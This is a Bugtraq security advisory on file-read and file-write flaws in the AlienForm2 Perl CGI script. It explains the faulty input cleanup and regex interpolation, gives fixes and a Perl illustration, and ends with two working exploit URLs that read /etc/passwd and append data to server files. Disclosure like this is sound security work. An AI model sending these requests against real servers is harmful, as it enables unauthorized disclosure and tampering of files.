Bugtraq mailing list archives

AlienForm2 CGI script: arbitrary file read/write


From: Nick Cleaton <nick () cleaton net>
Date: Mon, 10 Jun 2002 22:18:53 +0100

=====================================================================  

Vulnerable:     AlienForm2 revision 1.5
Category:       Perl/CGI coding errors
Impact:         Subject to file permissions, an attacker can read any
                file on the server, append arbitrary data to any
                existing file or write arbitrary data to new files.
Date:           10th June 2002
Vendor:         Jon Hedley
Homepage:       http://www.cgi.tj/scripts/alienform/
Vendor Status:  Notified 24th April 2002
Vendor Fix:     None available


Details
=======

AlienForm2 by Jon Hedley is a template-driven form-processing Perl
CGI script.  It is normally installed as af.cgi or alienform.cgi.
Template files on the server are used to configure the format of the
output document, the name of a log file and the format of the data to
append to the log file.

AlienForm2 is published under a licence that does not allow me to
reproduce parts of it here without permission, which I have been
unable to obtain.  This advisory is best read in conjunction with a
copy of af.cgi.

The paths to the template files come from CGI inputs, and a flaw in
the code that cleans up those inputs allows any file on the server to
be used as a template file.  The cleanup code replaces bad characters
and constructs with the empty string rather than with a harmless
placeholder, so the cleanup itself can splice the characters on either
side of a removed token into a construct it was meant to remove: the
input string ".|./" is transformed by the cleanup code to "../".

The path cleanup code can be found on lines 185, 186, 197 and 198 of
af.cgi.

The name of a CGI input in square brackets in a template is replaced
with the value of that input.  The regular expression which performs
the replacement interpolates the input name unescaped, so it is not
resilient to regular expression metacharacters in the name of a CGI
input, allowing an attacker to take full control of the contents of a
template after CGI input substitution.

The CGI input substitution code can be found on line 246 of af.cgi.


Suggested Fix
=============

On lines 185 and 197, change [] to [_]

On lines 186 and 198, change // to /_/

On lines 246 and 248, change $key to \Q$key\E
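
The two coding errors and the effect of the suggested fixes, as an
added Perl illustration that is not code from af.cgi (the licence
forbids reproducing it); the function names, the choice of "|" as the
stripped bad character and the order of the two substitutions are
assumptions, and the inputs are constructed:

```perl
#!/usr/bin/perl
# Added illustration for this advisory, not code from af.cgi. The two
# cleanup and two template-filling routines are constructed to show the
# flaws described above and what the suggested fixes change.
use strict;
use warnings;

# Flaw 1: deleting a bad token lets the characters on either side of it
# join into a new bad token. Assumed order: strip "..", then bad chars.
sub clean_path_weak {
    my ($p) = @_;
    $p =~ s/\.\.//g;     # delete ".." (empty-string replacement)
    $p =~ s/[|]//g;      # delete bad characters (empty-string replacement)
    return $p;
}

# Suggested fix: substitute "_" instead of the empty string, so removing
# one token can never leave a fresh ".." behind.
sub clean_path_fixed {
    my ($p) = @_;
    $p =~ s/\.\./_/g;
    $p =~ s/[|]/_/g;
    return $p;
}

# Flaw 2: the CGI input name is interpolated into the pattern as-is, so
# metacharacters in the name change what the pattern matches.
sub fill_template_weak {
    my ($tmpl, $key, $val) = @_;
    $tmpl =~ s/\[$key\]/$val/g;
    return $tmpl;
}

# Suggested fix: \Q...\E quotes every metacharacter in $key, so only the
# literal "[name]" token in the template is replaced.
sub fill_template_fixed {
    my ($tmpl, $key, $val) = @_;
    $tmpl =~ s/\[\Q$key\E\]/$val/g;
    return $tmpl;
}

# Constructed inputs: compare the weak and fixed outputs for each pair.
print clean_path_weak(".|./.|./etc/passwd"),  "\n";  # stripping "|" joins ".."
print clean_path_fixed(".|./.|./etc/passwd"), "\n";  # "_" keeps dots apart
my $tmpl = "root:x:0:0\nnobody:x:65534\n";
my $key  = 'x|^root.*|x';   # input name carrying regex metacharacters
print fill_template_weak($tmpl,  $key, 'REPLACED');  # alternation rewrites a line
print fill_template_fixed($tmpl, $key, 'REPLACED');  # no "[x|^root.*|x]" token: unchanged
```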


Exploits
========

Arbitrary file disclosure:

GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F
.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd

File writing:

This proof-of-concept exploit appends the text "hello there" to the
file /tmp/foo on the web server.  It requires the existence of the
file /tmp/passwd, consisting of just the three lines:

root:*:0:0:Charlie &:/root:/bin/csh
httpd:*:1004:1004:Apache daemon:/:/nonexistent
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

This exploit can be readily adapted to use any other file of two or
more lines in place of /tmp/passwd, and the file disclosure
vulnerability could be used to find a suitable file.  That process
could be automated.

GET /cgi-bin/af.cgi?_out_file=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.
%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Fpasswd&x9|^root.*|x9=.|.%2F.|.
%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Ffoo&x9|^http
d.*|x9=hello+there&x9|^nobody.*%0A|x9=
 
=====================================================================  

--
Nick Cleaton
nick () cleaton net

